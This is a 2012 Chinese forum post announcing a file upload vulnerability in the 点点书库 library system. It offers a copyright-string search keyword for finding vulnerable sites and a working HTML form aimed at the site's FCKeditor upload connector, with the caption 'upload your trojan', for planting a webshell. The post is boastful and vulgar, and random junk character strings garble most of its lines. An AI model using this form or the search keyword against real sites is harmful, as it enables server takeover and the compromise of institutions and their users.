主题:图书馆系统任意文件上传漏洞+ S. W; I; s M' X3 m- h# n" \
作者:冰锋刺客. N4 j3 J( v1 y
厂商:点击书(dianjishu.com)
9 l1 i9 ?9 d8 J 日期:2012-6-21
* @; Z, t5 o# ^9 S* `# x
$ Z$ b, u# I% w- X4 J: B; k- KI 概述
, E2 A9 c6 M# u$ }& ? 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell" o( S( S% s# l( v9 C2 i) c$ b
II 简介* ~. Z+ l) b! R9 R& F
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"# R$ u: ^: R( O0 b/ {
补充一个漏洞
" \- m1 D; v. H* v I& P <form id="frmUpload" enctype="multipart/form-data"
+ b" Y9 d+ U+ B6 v2 { action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>' G3 R: N' P2 S/ }) c
<input id="btnUpload" type="submit" value="操翻他">
! }# d% ^. S: r5 h </form>% P. o- w4 s D; `, Z+ W
你们懂的9 F: h/ [2 O; e7 i3 ?
那傻逼提供还需要改包.0 v9 y H( r0 q3 P+ Y& D- X K
自己看了下源代码发现fckeditor
$ i/ R- g4 T: c( I, J7 b7 m 直接秒杀
1 J( ]) \' s# u- E J& R |
发表于 2012-9-10 21:20:59
收藏
支持
反对